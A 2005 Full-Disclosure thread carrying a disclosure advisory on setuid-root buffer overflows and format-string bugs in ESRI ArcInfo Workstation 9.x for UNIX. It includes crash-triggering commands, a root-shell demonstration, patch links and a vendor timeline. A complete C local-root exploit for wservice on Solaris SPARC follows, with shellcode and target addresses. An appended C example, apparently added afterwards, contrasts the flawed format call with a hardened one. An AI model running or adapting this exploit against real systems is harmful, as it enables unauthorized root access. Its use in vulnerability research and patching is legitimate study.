Discussion:
DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
KF (lists)
2005-04-30 20:47:28 UTC
KF (lists)
2005-05-24 16:50:26 UTC
Esri has posted a version 8.3 patch to their web site:

http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1020

This patch should address the problems that I outlined in version 9.x
-KF
------------------------------------------------------------------------
DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
Author: Kevin Finisterre
Vendor: http://www.esri.com/, http://www.esri.com/software/arcgis/arcinfo/index.html
Product: 'ArcInfo Workstation for UNIX'
http://www.digitalmunition.com/DMA[2005-0425a].txt
On any given day, more than 1,000,000 people around the world use ESRI's GIS to improve the
way their organizations conduct business.
ESRI software is used by more than 300,000 organizations worldwide including most U.S. federal
agencies and national mapping agencies, 45 of the top 50 petroleum companies, all 50 U.S. state
health departments, most forestry companies, and many others in dozens of industries.
ESRI software is the standard in state and local government and is used by more than 24,000
state and local governments including Paris, France; Los Angeles, California, USA; Beijing, China;
and Kuwait City, Kuwait.
ESRI ArcGIS is an integrated collection of GIS software products for building a complete GIS.
ArcGIS enables users to deploy GIS functionality wherever it is needed in desktops, servers, or
custom applications; over the Web; or in the field.
Several local overflows and format string conditions have been found in the Unix versions of ESRI
ArcGIS products. ESRI Staff has promptly responded to and fixed the issues mentioned below. Patches
for ArcGIS 9.x will be available at the time this advisory is published.
(http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015)
Our testing was performed against ARCInfo Workstation 9 on two of ESRI's supported UNIX platforms.
We have currently only tested IRIX 6.5 and Solaris 10(beta). All UNIX ArcInfo installs are believed
to be impacted by these vulnerabilities. It is currently unknown how older versions of ArcGIS are
affected by these bugs. ESRI has stated that fixes for 8.x are forthcoming so I can only assume
exploitation is similar for this particular version.
The vulnerable binaries can be found in <install path>/bin. The files are both setuid and setgid so
they should be easily found during a routine setuid scan using the unix find utility. I was not able to
exploit ALL of the binaries I found however it is likely that more vulns could be discovered.
10 setuid root binaries are provided with the install of ARCInfo
-bash-2.05b$ pwd
/export/home/arcgis/arcexe9x/bin
-bash-2.05b$ ls -al `find . -perm -4000 `
-rwsr-sr-x 1 root nuucp 56772 Mar 5 2004 ./abservice
-rwsr-sr-x 1 root nuucp 4601408 Mar 5 2004 ./arcrqmgr
-rwsr-sr-x 1 root nuucp 2311796 Mar 5 2004 ./asbuild
-rwsr-sr-x 1 root nuucp 2817120 Mar 5 2004 ./asmaster
-rwsr-sr-x 1 root nuucp 7988480 Mar 5 2004 ./asrecovery
-rwsr-sr-x 1 root nuucp 8240340 Mar 5 2004 ./asuser
-rwsr-sr-x 1 root nuucp 2765020 Mar 5 2004 ./asutility
-rwsr-sr-x 1 root nuucp 75904 Mar 5 2004 ./lockmgr
-rwsr-sr-x 1 root nuucp 5652228 Mar 5 2004 ./se
-rwsr-sr-x 1 root nuucp 81332 Mar 5 2004 ./wservice
station0 515# ls -al `find . -perm -4000`
-rwsr-sr-x 1 root lp 44648 Mar 9 2004 ./abservice
-rwsr-sr-x 1 root lp 5920592 Mar 9 2004 ./arcrqmgr
-rwsr-sr-x 1 root lp 2508552 Mar 9 2004 ./asbuild
-rwsr-sr-x 1 root lp 3263552 Mar 9 2004 ./asmaster
-rwsr-sr-x 1 root lp 9758516 Mar 9 2004 ./asrecovery
-rwsr-sr-x 1 root lp 10065284 Mar 9 2004 ./asuser
-rwsr-sr-x 1 root lp 3229812 Mar 9 2004 ./asutility
-rwsr-sr-x 1 root lp 83260 Mar 9 2004 ./lockmgr
-rwsr-sr-x 1 root lp 6926980 Mar 9 2004 ./se
-rwsr-sr-x 1 root lp 83180 Mar 9 2004 ./wservice
For some reason the binaries are setgid (9). On our SunOS and IRIX boxes
this group corresponded respectively with nuucp and lp.
Some of the vulnerabilities will require a properly working license and license manager
-bash-2.05b# export LM_LICENSE_FILE=/export/home/arcgis/arcexe9x/sysgen/license.dat
-bash-2.05b# ps -ef | grep lmgr | grep -v grep
root 1294 1 0 18:14:44 pts/3 0:00 ./lmgrd -c ./license.dat
During exploitation you may see license requests mixed in with the application responses.
A cursory audit of the above listed applications revealed the following
flaws.
Both lockmgr and wservice are vulnerable to a format string attack.
-bash-2.05b$ export ARCHOME=AAAABBBB%x.%x.%x.%x
-bash-2.05b$ ./wservice
Can not find or access AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!
-bash-2.05b# export ARCHOME=%x.%x.%x.%x
-bash-2.05b# ./lockmgr
Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!
asmaster is vulnerable to a buffer overflow attack
-bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b
FATAL ERROR
Segment Violation
-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
FATAL ERROR
Segment Violation
asutility has multiple overflows
-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x 804'`
FATAL ERROR
Segment Violation
Please note that asutility has several other overflows. Listing them all is a
bit redundant.
se is subject to a buffer overflow
-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
FATAL ERROR
Segment Violation
asrecovery is subject to a buffer overflow
-bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a
FATAL ERROR
Segment Violation
In order to show that these issues do indeed pose a security risk we have created PoC for the
format string conditions in wservice and lockmgr. This exploit was tested on the solaris platform
however exploitation on other platforms should be trivial.
-bash-2.05b$ ./ex_ARC_wservice
Can not find or access
# id
uid=0(root) gid=0(root)
chmod -s the above mentioned setuid files or apply the patches supplied by ESRI which can be located
at http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
This is the basic timeline associated with this bug.
01/18/2005 assigned case #409658 Jeremy W takes ownership of the technical support incident
01/18/2005 Jeremy W logged this vulnerability as defect number CQ00261045
01/26/2005 Johnh exploited the bug on solaris
--/--/---- Multiple communications involving the issues at hand over a several month period
04/11/2005 Bug patches provided to KF for testing
04/27/2005 Fixes have been tested and verified
04/30/2005 Public disclosure.
As mentioned above ESRI was very prompt in addressing and fixing the issues at hand. Since the
discovery of these bugs ESRI has attempted to proactively prevent future exploits from occurring.
-KF
------------------------------------------------------------------------
/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP "\xa2\x1c\x40\x11"
int iType;
struct
{
unsigned long retloc;
unsigned long retaddr;
char *type;
}targets[] =
{
/* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
0003a234 d thr_jmp_table
*/
{0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
{0x41424344,0x41424344,"DEBUG"},
},v;
//shellcode taken from netric
char shellcode[] =
"55"
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
// setreuid(0,0);
"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x10\x20\xca" // mov 0xca, %g1
"\x91\xd0\x20\x08" // ta 8
"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\xcb" // mov 0x2e, %g1
"\x91\xd0\x20\x08" // ta 8 [setregid(0,0)]
"\x21\x0b\xd9\x19" // sethi %hi(0x2f646400), %l0
"\xa0\x14\x21\x76" // or %l0, 0x176, %l0
"\x23\x0b\xdd\x1d" // sethi %hi(0x2f747400), %l1
"\xa2\x14\x60\x79" // or %l1, 0x79, %l1
"\xe0\x3b\xbf\xf8" // std %l0, [ %sp - 0x8 ]
"\x90\x23\xa0\x08" // sub %sp, 8, %o0
"\x92\x1b\x80\x0e" // xor %sp, %sp, %o1
"\x82\x10\x20\x05" // mov 0x05, %g1
"\x91\xd0\x20\x08" // ta 8 [open("/dev/tty",RD_ONLY)]
"\x90\x10\x20\x02" // mov 0x02, %o0
"\x82\x10\x20\x29" // mov 0x29, %g1
"\x91\xd0\x20\x08" // ta 8 [dup(2)]
"\x21\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l0
"\xa0\x14\x21\x6e" // or %l0, 0x16e, %l0
"\x23\x0b\xcb\xdc" // sethi %hi(0x2f2f7000), %l1
"\xa2\x14\x63\x68" // or %l1, 0x368, %l1
"\xe0\x3b\xbf\xf0" // std %l0, [ %sp - 0x10 ]
"\xc0\x23\xbf\xf8" // clr [ %sp - 0x8 ]
"\x90\x23\xa0\x10" // sub %sp, 0x10, %o0
"\xc0\x23\xbf\xec" // clr [ %sp - 0x14 ]
"\xd0\x23\xbf\xe8" // st %o0, [ %sp - 0x18 ]
"\x92\x23\xa0\x18" // sub %sp, 0x18, %o1
"\x94\x22\x80\x0a" // sub %o2, %o2, %o2
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x08" // ta 8 [execve("/bin/sh","/bin/sh",NULL)]
"\x82\x10\x20\x01" // mov 0x01, %g1
"\x91\xd0\x20\x08" // ta 8 [exit(?)]
"\x10\xbf\xff\xdf" // b shellcode
"\x90\x1d\x80\x16"; // or %o1, %o1, %o1
/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
*ptr++ = (char) (value >> 24) & 0xff;
*ptr++ = (char) (value >> 16) & 0xff;
*ptr++ = (char) (value >> 8) & 0xff;
*ptr++ = (char) (value >> 0) & 0xff;
return ptr;
}
/* main */
int main(int argc, char **argv)
{
unsigned long retaddr;
unsigned long retloc;
int offset = 23;
int dump_fmt=129;
int al = 1;
int i=0;
int x=0;
int c;
unsigned long hi,lo;
static unsigned long shift0,shift1;
char buf[9000];
char *args[24];
char *env[6];
char *ptr;
char padding[64];
char padding1[64];
char buf2[9000];
if (argc < 3) {
usage (argv[0]);
return -1;
}
while((c = getopt(argc, argv, "h:t:")) != EOF) {
switch(c) {
usage (argv[0]);
return 0;
iType = atoi (optarg);
break;
usage (argv[0]);
return 0;
}
}
if (argc < 2) { usage(argv[0]); exit(1); }
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return 0;
}
env[0] = shellcode;
env[1] = buf2;
env[2] = NULL;
args[0] = VULPROG;
args[1] = NULL;
retloc = targets[iType].retloc;
retaddr = targets[iType].retaddr;
hi = (retaddr >> 16) & 0xffff;
lo = (retaddr >> 0) & 0xffff;
shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
shift1 = (0x10000 + lo) - hi;
memset(buf,0x00,sizeof(buf));
memset(buf2,0x00,sizeof(buf2));
ptr = buf;
for (i = 0; i < al; i++) {
*ptr++ = 0x41;
}
ptr = putLong (ptr, 0x41414141);
ptr = putLong (ptr, retloc);
ptr = putLong (ptr, 0x42424242);
ptr = putLong (ptr, retloc+2);
for (i = 0 ; i < dump_fmt; i ++) {
memcpy(ptr, "%.8x", 4);
ptr = ptr + 4;
}
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift0);
strcat(ptr,"lx%hn");
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift1);
strcat(ptr,"lx%hn");
strcat(buf2,"ARCHOME=");
memcpy(buf2+strlen(buf2),buf,strlen(buf));
execve (args[0], args, env);
perror ("execve");
return 0;
}
int usage(char *p)
{
int i;
printf( "Arcgis local root format string exploit\r\n");
printf( "Usage: %s <-t target>\n",p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("%d\t%s\n", i, targets[i].type);
}
return 0;
}
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
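
The format string condition shown above for wservice and lockmgr, as an added C example (not part of the original advisory and not ESRI's code): the flawed shape is an assumed reconstruction kept behind SHOW_VULNERABLE, next to a constant-format version and a check on ARCHOME. The names report_unsafe, report_safe, archome_ok and the ARCHOME_MAX limit are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define ARCHOME_MAX 256 /* assumed upper bound, chosen for this example */

#ifdef SHOW_VULNERABLE
/* Assumed shape of the flaw: the message built from ARCHOME is reused as the
 * format string, so "%x" in the variable reads stack words, as in the output
 * quoted in the advisory. */
int report_unsafe(char *out, size_t n, const char *archome, const char *prog)
{
    char msg[512];
    snprintf(msg, sizeof msg, "Can not find or access %s - %s not run!", archome, prog);
    return snprintf(out, n, msg); /* BUG: attacker-influenced format */
}
#endif

/* Hardened form: the format is a constant; ARCHOME is only ever an argument. */
int report_safe(char *out, size_t n, const char *archome, const char *prog)
{
    return snprintf(out, n, "Can not find or access %s - %s not run!", archome, prog);
}

/* Checks a privileged program can apply before using ARCHOME at all.
 * Returns 1 if the value is acceptable, 0 otherwise. */
int archome_ok(const char *v)
{
    size_t i, len;
    if (v == NULL || v[0] != '/')
        return 0; /* require an absolute path */
    len = strlen(v);
    if (len >= ARCHOME_MAX)
        return 0; /* bound the length before any copy */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)v[i];
        if (c < 0x20 || c > 0x7e || c == '%')
            return 0; /* no control bytes, no conversion specifiers */
    }
    return 1;
}

int main(void)
{
    /* Constructed sample values: an install path and the advisory's test string. */
    const char *samples[] = { "/export/home/arcgis/arcexe9x", "AAAABBBB%x.%x.%x.%x" };
    char line[512];
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        report_safe(line, sizeof line, samples[i], "wservice");
        printf("ok=%d  %s\n", archome_ok(samples[i]), line);
    }
    return 0;
}
```

Building with -Wformat -Wformat-security makes the compiler flag the non-literal format in the SHOW_VULNERABLE variant.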